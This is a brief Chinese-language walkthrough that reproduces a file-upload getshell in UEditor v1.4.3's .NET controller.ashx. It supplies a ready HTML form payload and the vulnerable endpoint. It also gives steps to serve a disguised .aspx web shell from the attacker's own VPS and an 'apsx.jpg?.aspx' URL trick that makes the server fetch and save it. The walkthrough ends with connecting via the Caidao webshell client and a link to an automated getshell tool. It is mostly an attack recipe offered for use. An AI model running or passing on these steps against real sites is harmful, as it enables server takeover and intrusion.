ueditor(v1.4.3)文件上傳getshell實戰復現

漏洞存在點：

http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8

 

漏洞原因：controller.ashx文件下只校驗ContentType而沒校驗文件后綴導致getshell。

payload如下，並保存為html格式

<form action="http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8"enctype="application/x-www-form-urlencoded" method="POST"> shell addr: <input type="text" name="source[]" />
 <input type="submit" value="Submit" />
</form>

 在自己的VPS上啟動一個簡易的HTTP服務，並傳馬(可以不用圖片馬，直接改后綴名為jpg)

python -m SimpleHTTPServer 80

訪問自己的VPS即可看見服務已經啟動。

打開上面含payload的html文件

 然后文本框中添加下面的鏈接，X.X.X.X是VPS地址

http://X.X.X.X/apsx.jpg?.aspx

 點擊提交

 菜刀連接

服務器這邊的記錄

 

另外附上GETSHELL的工具：https://github.com/theLSA/ueditor-getshell

還附上最近大佬的分析鏈接：https://xz.aliyun.com/t/8488